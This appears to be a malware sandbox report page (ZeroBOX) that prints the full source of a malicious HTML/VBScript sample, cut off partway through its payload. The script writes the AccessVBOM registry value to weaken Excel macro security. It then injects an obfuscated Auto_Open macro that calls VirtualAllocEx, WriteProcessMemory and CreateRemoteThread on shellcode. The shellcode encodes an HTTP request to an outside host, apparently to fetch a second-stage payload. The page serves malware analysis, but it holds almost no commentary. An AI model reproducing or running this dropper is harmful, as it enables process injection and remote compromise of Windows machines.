popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<html><head><script language="vbscript">
Dim objExcel, WshShell, RegPath, action, objWorkbook, xlmodule
Set objExcel = CreateObject("Excel.Application")
objExcel.Visible = False
Set WshShell = CreateObject("Wscript.Shell")
function RegExists(regKey)
on error resume next
WshShell.RegRead regKey
RegExists = (Err.number = 0)
end function
' Get the old AccessVBOM value
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"
if RegExists(RegPath) then
action = WshShell.RegRead(RegPath)
action = ""
end if
' Weaken the target
WshShell.RegWrite RegPath, 1, "REG_DWORD"
' Run the macro
Set objWorkbook = objExcel.Workbooks.Add()
Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
xlmodule.CodeModule.AddFromString "Private "&"Type PRO"&"CESS_INF"&"ORMATION"&Chr(10)&" hPro"&"cess As "&"Long"&Chr(10)&" hThr"&"ead As L"&"ong"&Chr(10)&" dwPr"&"ocessId "&"As Long"&Chr(10)&" dwTh"&"readId A"&"s Long"&Chr(10)& _
"End Type"&Chr(10)&Chr(10)&"Private "&"Type STA"&"RTUPINFO"&Chr(10)&" cb A"&"s Long"&Chr(10)&" lpRe"&"served A"&"s String"&Chr(10)&" lpDe"&"sktop As"&" String"&Chr(10)&" lpTi"&"tle As S"&"tring"& _
Chr(10)&" dwX "&"As Long"&Chr(10)&" dwY "&"As Long"&Chr(10)&" dwXS"&"ize As L"&"ong"&Chr(10)&" dwYS"&"ize As L"&"ong"&Chr(10)&" dwXC"&"ountChar"&"s As Lon"&"g"&Chr(10)&" dwYC"&"ountChar"& _
"s As Lon"&"g"&Chr(10)&" dwFi"&"llAttrib"&"ute As L"&"ong"&Chr(10)&" dwFl"&"ags As L"&"ong"&Chr(10)&" wSho"&"wWindow "&"As Integ"&"er"&Chr(10)&" cbRe"&"served2 "&"As Integ"&"er"&Chr(10)&" lpRe"& _
"served2 "&"As Long"&Chr(10)&" hStd"&"Input As"&" Long"&Chr(10)&" hStd"&"Output A"&"s Long"&Chr(10)&" hStd"&"Error As"&" Long"&Chr(10)&"End Type"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "&"Then"&Chr(10)& _
" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Cre"&"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)& _
" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)&" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" LongPtr"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"& _
"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"&"ong"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "& _
Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"& _
Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"& _
"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"Dest As "&"LongPtr"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"& _
"engthWro"&"te As Lo"&"ngPtr"&Chr(41)&" As Long"&"Ptr"&Chr(10)&" Priv"&"ate Decl"&"are PtrS"&"afe Func"&"tion Run"&"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)& _
" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)&" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"& _
Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"&"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Director"&"y As Str"&"ing"&Chr(44)& _
" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)&" As Long"&Chr(10)&Chr(35)&"Else"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion Cre"& _
"ateStuff"&" Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreateRe"&"moteThre"&"ad"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"&"pThreadA"&"ttribute"&"s As Lon"&"g"&Chr(44)& _
" ByVal d"&"wStackSi"&"ze As Lo"&"ng"&Chr(44)&" ByVal l"&"pStartAd"&"dress As"&" Long"&Chr(44)&" lpParam"&"eter As "&"Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpThrea"&"dID As L"& _
"ong"&Chr(41)&" As Long"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion All"&"ocStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"VirtualA"&"llocEx"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"& _
"s Long"&Chr(44)&" ByVal l"&"pAddr As"&" Long"&Chr(44)&" ByVal l"&"Size As "&"Long"&Chr(44)&" ByVal f"&"lAllocat"&"ionType "&"As Long"&Chr(44)&" ByVal f"&"lProtect"&" As Long"&Chr(41)&" As Long"&Chr(10)& _
" Priv"&"ate Decl"&"are Func"&"tion Wri"&"teStuff "&"Lib "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"WritePro"&"cessMemo"&"ry"&Chr(34)&" "&Chr(40)&"ByVal hP"&"rocess A"&"s Long"&Chr(44)&" ByVal l"& _
"Dest As "&"Long"&Chr(44)&" ByRef S"&"ource As"&" Any"&Chr(44)&" ByVal L"&"ength As"&" Long"&Chr(44)&" ByVal L"&"engthWro"&"te As Lo"&"ng"&Chr(41)&" As Long"&Chr(10)&" Priv"&"ate Decl"&"are Func"&"tion Run"& _
"Stuff Li"&"b "&Chr(34)&"kernel32"&Chr(34)&" Alias "&Chr(34)&"CreatePr"&"ocessA"&Chr(34)&" "&Chr(40)&"ByVal lp"&"Applicat"&"ionName "&"As Strin"&"g"&Chr(44)&" ByVal l"&"pCommand"&"Line As "&"String"&Chr(44)& _
" lpProce"&"ssAttrib"&"utes As "&"Any"&Chr(44)&" lpThrea"&"dAttribu"&"tes As A"&"ny"&Chr(44)&" ByVal b"&"InheritH"&"andles A"&"s Long"&Chr(44)&" ByVal d"&"wCreatio"&"nFlags A"&"s Long"&Chr(44)&" lpEnvir"& _
"onment A"&"s Any"&Chr(44)&" ByVal l"&"pCurrent"&"Driector"&"y As Str"&"ing"&Chr(44)&" lpStart"&"upInfo A"&"s STARTU"&"PINFO"&Chr(44)&" lpProce"&"ssInform"&"ation As"&" PROCESS"&"_INFORMA"&"TION"&Chr(41)& _
" As Long"&Chr(10)&Chr(35)&"End If"&Chr(10)&Chr(10)&"Sub Auto"&"_Open"&Chr(40)&Chr(41)&Chr(10)&" Dim "&"myByte A"&"s Long"&Chr(44)&" myArray"&" As Vari"&"ant"&Chr(44)&" offset "&"As Long"&Chr(10)&" Dim "& _
"pInfo As"&" PROCESS"&"_INFORMA"&"TION"&Chr(10)&" Dim "&"sInfo As"&" STARTUP"&"INFO"&Chr(10)&" Dim "&"sNull As"&" String"&Chr(10)&" Dim "&"sProc As"&" String"&Chr(10)&Chr(10)&Chr(35)&"If VBA7 "& _
"Then"&Chr(10)&" Dim "&"rwxpage "&"As LongP"&"tr"&Chr(44)&" res As "&"LongPtr"&Chr(10)&Chr(35)&"Else"&Chr(10)&" Dim "&"rwxpage "&"As Long"&Chr(44)&" res As "&"Long"&Chr(10)&Chr(35)&"End If"&Chr(10)& _
" myAr"&"ray "&Chr(61)&" Array"&Chr(40)&Chr(45)&"4"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"119"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"96"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"27"&Chr(44)&"49"& _
Chr(44)&Chr(45)&"46"&Chr(44)&"100"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"12"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"20"&Chr(44)&Chr(45)&"117"& _
Chr(44)&"114"&Chr(44)&"40"&Chr(44)&"15"&Chr(44)&Chr(45)&"73"&Chr(44)&"74"&Chr(44)&"38"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&"60"&Chr(44)&"97"& _
Chr(44)&"124"&Chr(44)&"2"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&" _"&Chr(10)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&Chr(45)&"30"&Chr(44)&Chr(45)&"16"&Chr(44)& _
"82"&Chr(44)&"87"&Chr(44)&Chr(45)&"117"&Chr(44)&"82"&Chr(44)&"16"&Chr(44)&Chr(45)&"117"&Chr(44)&"66"&Chr(44)&"60"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"117"&Chr(44)&"64"&Chr(44)&"120"&Chr(44)& _
Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&"74"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&"80"&Chr(44)&Chr(45)&"117"&Chr(44)&"72"&Chr(44)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"32"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"29"&Chr(44)&"60"&Chr(44)&"73"&Chr(44)&Chr(45)&"117"&Chr(44)&"52"&Chr(44)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"42"&Chr(44)&"49"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"49"&Chr(44)&Chr(45)&"64"&Chr(44)&Chr(45)&"84"&Chr(44)&Chr(45)&"63"&Chr(44)&Chr(45)&"49"&Chr(44)&"13"&Chr(44)&"1"&Chr(44)&Chr(45)&"57"&Chr(44)&"56"&Chr(44)&Chr(45)&"32"&Chr(44)&"117"& _
Chr(44)&Chr(45)&"12"&Chr(44)&"3"&Chr(44)&"125"&Chr(44)&Chr(45)&"8"&Chr(44)&"59"&Chr(44)&"125"&Chr(44)&"36"&Chr(44)&"117"&Chr(44)&Chr(45)&"30"&Chr(44)&"88"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"36"& _
Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&"102"&Chr(44)&Chr(45)&"117"&Chr(44)&"12"&Chr(44)&"75"&Chr(44)&Chr(45)&"117"&Chr(44)&"88"&Chr(44)&"28"&Chr(44)&"1"&Chr(44)&Chr(45)&"45"&Chr(44)&Chr(45)&"117"&Chr(44)& _
"4"&Chr(44)&" _"&Chr(10)&Chr(45)&"117"&Chr(44)&"1"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"119"&Chr(44)&"68"&Chr(44)&"36"&Chr(44)&"36"&Chr(44)&"91"&Chr(44)&"91"&Chr(44)&"97"&Chr(44)&"89"&Chr(44)&"90"&Chr(44)& _
"81"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"32"&Chr(44)&"88"&Chr(44)&"95"&Chr(44)&"90"&Chr(44)&Chr(45)&"117"&Chr(44)&"18"&Chr(44)&Chr(45)&"21"&Chr(44)&Chr(45)&"122"&Chr(44)&"93"&Chr(44)&"104"&Chr(44)&"110"& _
Chr(44)&"101"&Chr(44)&"116"&Chr(44)&"0"&Chr(44)&"104"&Chr(44)&"119"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"105"&Chr(44)&"84"&Chr(44)&"104"&Chr(44)&"76"&Chr(44)&"119"&Chr(44)&"38"&Chr(44)&"7"&Chr(44)&Chr(45)& _
"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"58"&Chr(44)&"86"&Chr(44)&"121"&Chr(44)&Chr(45)& _
"89"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"124"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"55"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)& _
"106"&Chr(44)&"3"&Chr(44)&"81"&Chr(44)&"81"&Chr(44)&"104"&Chr(44)&"80"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&"87"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"97"& _
Chr(44)&" _"&Chr(10)&Chr(45)&"58"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"21"&Chr(44)&"112"&Chr(44)&"91"&Chr(44)&"49"&Chr(44)&Chr(45)&"46"&Chr(44)&"82"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)& _
"2"&Chr(44)&"64"&Chr(44)&Chr(45)&"124"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"82"&Chr(44)&"83"&Chr(44)&"82"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"21"&Chr(44)&"85"&Chr(44)&"46"&Chr(44)&"59"&Chr(44)&Chr(45)& _
"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"125"&Chr(44)&Chr(45)&"61"&Chr(44)&"80"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"&Chr(44)&"87"&Chr(44)&"106"&Chr(44)& _
Chr(45)&"1"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&" _"&Chr(10)&"104"&Chr(44)&"45"&Chr(44)&"6"&Chr(44)&"24"&Chr(44)&"123"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"& _
Chr(44)&"15"&Chr(44)&Chr(45)&"124"&Chr(44)&Chr(45)&"61"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"10"&Chr(44)&"116"&Chr(44)&"4"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"7"&Chr(44)&Chr(45)&"21"&Chr(44)&"9"&Chr(44)&"104"&Chr(44)&Chr(45)&"86"&Chr(44)&Chr(45)&"59"&Chr(44)&Chr(45)&"30"&Chr(44)&"93"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)& _
Chr(45)&"119"&Chr(44)&Chr(45)&"63"&Chr(44)&"104"&Chr(44)&"69"&Chr(44)&"33"&Chr(44)&"94"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"43"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&"87"& _
Chr(44)&"106"&Chr(44)&"7"&Chr(44)&"81"&Chr(44)&"86"&Chr(44)&"80"&Chr(44)&"104"&Chr(44)&Chr(45)&"73"&Chr(44)&"87"&Chr(44)&Chr(45)&"32"&Chr(44)&"11"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)& _
"65"&Chr(44)&"0"&Chr(44)&"47"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"57"&Chr(44)&Chr(45)&"57"&Chr(44)&"116"&Chr(44)&Chr(45)&"73"&Chr(44)&"49"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"111"&Chr(44)& _
"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"23"&Chr(44)&Chr(45)&"55"&Chr(44)&"1"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"117"&Chr(44)&Chr(45)&"1"&Chr(44)&" _"&Chr(10)&Chr(45)&"1"& _
Chr(44)&Chr(45)&"1"&Chr(44)&"47"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"112"&Chr(44)&"111"&Chr(44)&"110"&Chr(44)&"101"&Chr(44)&"110"&Chr(44)&"116"&Chr(44)&"115"&Chr(44)&"47"&Chr(44)&"116"&Chr(44)& _
"97"&Chr(44)&"98"&Chr(44)&"95"&Chr(44)&"104"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"101"&Chr(44)&"46"&Chr(44)&"105"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"0"&Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"82"&Chr(44)& _
Chr(45)&"96"&Chr(44)&Chr(45)&"25"&Chr(44)&Chr(45)&"23"&Chr(44)&"18"&Chr(44)&"114"&Chr(44)&"63"&Chr(44)&"50"&Chr(44)&Chr(45)&"68"&Chr(44)&Chr(45)&"122"&Chr(44)&Chr(45)&"77"&Chr(44)&"8"&Chr(44)&" _"&Chr(10)& _
Chr(45)&"39"&Chr(44)&Chr(45)&"49"&Chr(44)&Chr(45)&"48"&Chr(44)&Chr(45)&"105"&Chr(44)&Chr(45)&"42"&Chr(44)&"5"&Chr(44)&"72"&Chr(44)&"15"&Chr(44)&Chr(45)&"6"&Chr(44)&"23"&Chr(44)&"116"&Chr(44)&Chr(45)&"47"& _
Chr(44)&Chr(45)&"110"&Chr(44)&"110"&Chr(44)&Chr(45)&"122"&Chr(44)&Chr(45)&"29"&Chr(44)&"33"&Chr(44)&"48"&Chr(44)&"66"&Chr(44)&"60"&Chr(44)&"119"&Chr(44)&Chr(45)&"26"&Chr(44)&Chr(45)&"12"&Chr(44)&Chr(45)& _
"30"&Chr(44)&"5"&Chr(44)&Chr(45)&"10"&Chr(44)&"96"&Chr(44)&Chr(45)&"5"&Chr(44)&"68"&Chr(44)&Chr(45)&"8"&Chr(44)&"86"&Chr(44)&Chr(45)&"12"&Chr(44)&Chr(45)&"43"&Chr(44)&"106"&Chr(44)&Chr(45)&"20"&Chr(44)& _
Chr(45)&"67"&Chr(44)&Chr(45)&"115"&Chr(44)&"39"&Chr(44)&"59"&Chr(44)&Chr(45)&"47"&Chr(44)&" _"&Chr(10)&"52"&Chr(44)&"0"&Chr(44)&"72"&Chr(44)&"111"&Chr(44)&"115"&Chr(44)&"116"&Chr(44)&"58"&Chr(44)&"32"& _
Chr(44)&"119"&Chr(44)&"119"&Chr(44)&"119"&Chr(44)&"46"&Chr(44)&"104"&Chr(44)&"101"&Chr(44)&"97"&Chr(44)&"108"&Chr(44)&"116"&Chr(44)&"104"&Chr(44)&"115"&Chr(44)&"111"&Chr(44)&"117"&Chr(44)&"116"&Chr(44)& _
"104"&Chr(44)&"100"&Chr(44)&"111"&Chr(44)&"116"&Chr(44)&"104"&Chr(44)&"97"&Chr(44)&"110"&Chr(44)&"46"&Chr(44)&"99"&Chr(44)&"111"&Chr(44)&"109"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"67"&Chr(44)&"111"&Chr(44)& _
"110"&Chr(44)&"110"&Chr(44)&"101"&Chr(44)&" _"&Chr(10)&"99"&Chr(44)&"116"&Chr(44)&"105"&Chr(44)&"111"&Chr(44)&"110"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"99"&Chr(44)&"108"&Chr(44)&"111"&Chr(44)&"115"&Chr(44)& _
"101"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"65"&Chr(44)&"99"&Chr(44)&"99"&Chr(44)&"101"&Chr(44)&"112"&Chr(44)&"116"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"105"&Chr(44)&"109"&Chr(44)&"97"&Chr(44)&"103"&Chr(44)& _
"101"&Chr(44)&"47"&Chr(44)&"42"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"65"&Chr(44)&"99"&Chr(44)&"99"&Chr(44)&"101"&Chr(44)&"112"&Chr(44)&"116"&Chr(44)&"45"&Chr(44)&"76"&Chr(44)&"97"&Chr(44)&" _"&Chr(10)&"110"& _
Chr(44)&"103"&Chr(44)&"117"&Chr(44)&"97"&Chr(44)&"103"&Chr(44)&"101"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"102"&Chr(44)&"114"&Chr(44)&"45"&Chr(44)&"67"&Chr(44)&"72"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&"102"& _
Chr(44)&"114"&Chr(44)&"59"&Chr(44)&"113"&Chr(44)&"61"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"57"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&"101"&Chr(44)&"110"&Chr(44)&"59"&Chr(44)&"113"&Chr(44)&"61"&Chr(44)&"48"&Chr(44)& _
"46"&Chr(44)&"56"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&"100"&Chr(44)&"101"&Chr(44)&"59"&Chr(44)&"113"&Chr(44)&"61"&Chr(44)&" _"&Chr(10)&"48"&Chr(44)&"46"&Chr(44)&"55"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)&"42"& _
Chr(44)&"59"&Chr(44)&"113"&Chr(44)&"61"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"53"&Chr(44)&"13"&Chr(44)&"10"&Chr(44)&"85"&Chr(44)&"115"&Chr(44)&"101"&Chr(44)&"114"&Chr(44)&"45"&Chr(44)&"65"&Chr(44)&"103"&Chr(44)& _
"101"&Chr(44)&"110"&Chr(44)&"116"&Chr(44)&"58"&Chr(44)&"32"&Chr(44)&"77"&Chr(44)&"111"&Chr(44)&"122"&Chr(44)&"105"&Chr(44)&"108"&Chr(44)&"108"&Chr(44)&"97"&Chr(44)&"47"&Chr(44)&"53"&Chr(44)&"46"&Chr(44)& _
"48"&Chr(44)&"32"&Chr(44)&"40"&Chr(44)&"87"&Chr(44)&" _"&Chr(10)&"105"&Chr(44)&"110"&Chr(44)&"100"&Chr(44)&"111"&Chr(44)&"119"&Chr(44)&"115"&Chr(44)&"32"&Chr(44)&"78"&Chr(44)&"84"&Chr(44)&"32"&Chr(44)& _
"49"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"87"&Chr(44)&"105"&Chr(44)&"110"&Chr(44)&"54"&Chr(44)&"52"&Chr(44)&"59"&Chr(44)&"32"&Chr(44)&"120"&Chr(44)&"54"&Chr(44)&"52"& _
Chr(44)&"41"&Chr(44)&"32"&Chr(44)&"65"&Chr(44)&"112"&Chr(44)&"112"&Chr(44)&"108"&Chr(44)&"101"&Chr(44)&"87"&Chr(44)&"101"&Chr(44)&"98"&Chr(44)&"75"&Chr(44)&"105"&Chr(44)&"116"&Chr(44)&"47"&Chr(44)&" _"& _
Chr(10)&"53"&Chr(44)&"51"&Chr(44)&"55"&Chr(44)&"46"&Chr(44)&"51"&Chr(44)&"54"&Chr(44)&"32"&Chr(44)&"40"&Chr(44)&"75"&Chr(44)&"72"&Chr(44)&"84"&Chr(44)&"77"&Chr(44)&"76"&Chr(44)&"44"&Chr(44)&"32"&Chr(44)& _
"108"&Chr(44)&"105"&Chr(44)&"107"&Chr(44)&"101"&Chr(44)&"32"&Chr(44)&"71"&Chr(44)&"101"&Chr(44)&"99"&Chr(44)&"107"&Chr(44)&"111"&Chr(44)&"41"&Chr(44)&"32"&Chr(44)&"67"&Chr(44)&"104"&Chr(44)&"114"&Chr(44)& _
"111"&Chr(44)&"109"&Chr(44)&"101"&Chr(44)&"47"&Chr(44)&"57"&Chr(44)&"51"&Chr(44)&"46"&Chr(44)&"48"&Chr(44)&"46"&Chr(44)&"52"&Chr(44)&" _"&Chr(10)&"53"&Chr(44)&"55"&Chr(44)&"55"&Chr(44)&"46"&Chr(44)&"54"& _
Chr(44)&"51"&Chr(44)&"32"&Chr(44)&"83"&Chr(44)&"97"&Chr(44)&"102"&Chr(44)&"97"&Chr(44)&"114"&Chr(44)&"105"&Chr(44)&"47"&Chr(44)&"53"&Chr(44)&"51"&Chr(44)&"55"&Chr(44)&"46"&Chr(44)&"51"&Chr(44)&"54"&Chr(44)& _
"13"&Chr(44)&"10"&Chr(44)&"0"&Chr(44)&"89"&Chr(44)&"93"&Chr(44)&Chr(45)&"31"&Chr(44)&Chr(45)&"28"&Chr(44)&"101"&Chr(44)&"96"&Chr(44)&"86"&Chr(44)&Chr(45)&"95"&Chr(44)&"114"&Chr(44)&"91"&Chr(44)&Chr(45)& _
"32"&Chr(44)&Chr(45)&"73"&Chr(44)&"35"&Chr(44)&"123"&Chr(44)&Chr(45)&"39"&Chr(44)&"97"&Chr(44)&Chr(45)&"96"&Chr(44)&" _"&Chr(10)&Chr(45)&"109"&Chr(44)&Chr(45)&"115"&Chr(44)&Chr(45)&"3"&Chr(44)&"117"&Chr(44)& _
Chr(45)&"109"&Chr(44)&Chr(45)&"109"&Chr(44)&Chr(45)&"118"&Chr(44)&Chr(45)&"64"&Chr(44)&"51"&Chr(44)&Chr(45)&"106"&Chr(44)&Chr(45)&"52"&Chr(44)&"75"&Chr(44)&"93"&Chr(44)&Chr(45)&"103"&Chr(44)&Chr(45)&"48"& _
Chr(44)&Chr(45)&"68"&Chr(44)&"80"&Chr(44)&Chr(45)&"59"&Chr(44)&Chr(45)&"26"&Chr(44)&Chr(45)&"90"&Chr(44)&Chr(45)&"68"&Chr(44)&Chr(45)&"3"&Chr(44)&"124"&Chr(44)&Chr(45)&"79"&Chr(44)&"55"&Chr(44)&"0"&Chr(44)& _
"104"&Chr(44)&Chr(45)&"16"&Chr(44)&Chr(45)&"75"&Chr(44)&Chr(45)&"94"&Chr(44)&"86"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&"106"&Chr(44)&"64"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)&"16"&Chr(44)&"0"& _
Chr(44)&"0"&Chr(44)&" _"&Chr(10)&"104"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"64"&Chr(44)&"0"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"88"&Chr(44)&Chr(45)&"92"&Chr(44)&"83"&Chr(44)&Chr(45)&"27"&Chr(44)&Chr(45)&"1"& _
Chr(44)&Chr(45)&"43"&Chr(44)&Chr(45)&"109"&Chr(44)&Chr(45)&"71"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"1"&Chr(44)&Chr(45)&"39"&Chr(44)&"81"&Chr(44)&"83"&Chr(44)&Chr(45)&"119"&Chr(44)& _
Chr(45)&"25"&Chr(44)&"87"&Chr(44)&"104"&Chr(44)&"0"&Chr(44)&"32"&Chr(44)&"0"&Chr(44)&"0"&Chr(44)&"83"&Chr(44)&"86"&Chr(44)&"104"&Chr(44)&"18"&Chr(44)&Chr(45)&"106"&Chr(44)&Chr(45)&"119"&Chr(44)&Chr(45)& _
"30"&Chr(44)&Chr(45)&"1"&Chr(44)&Chr(45)&"43"&Chr(44)&" _"&Chr(10)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"116"&Chr(44)&Chr(45)&"58"&Chr(44)&Chr(45)&"117"&Chr(44)&"7"&Chr(44)&"1"&Chr(44)&Chr(45)&"61"& _
Chr(44)&Chr(45)&"123"&Chr(44)&Chr(45)&"64"&Chr(44)&"117"&Chr(44)&Chr(45)&"27"&Chr(44)&"88"&Chr(44)&Chr(45)&"61"&Chr(44)&Chr(45)&"24"&Chr(44)&Chr(45)&"87"&Chr(44)&Chr(45)&"3"&Chr(44)&Chr(45)&"1"&Chr(44)& _
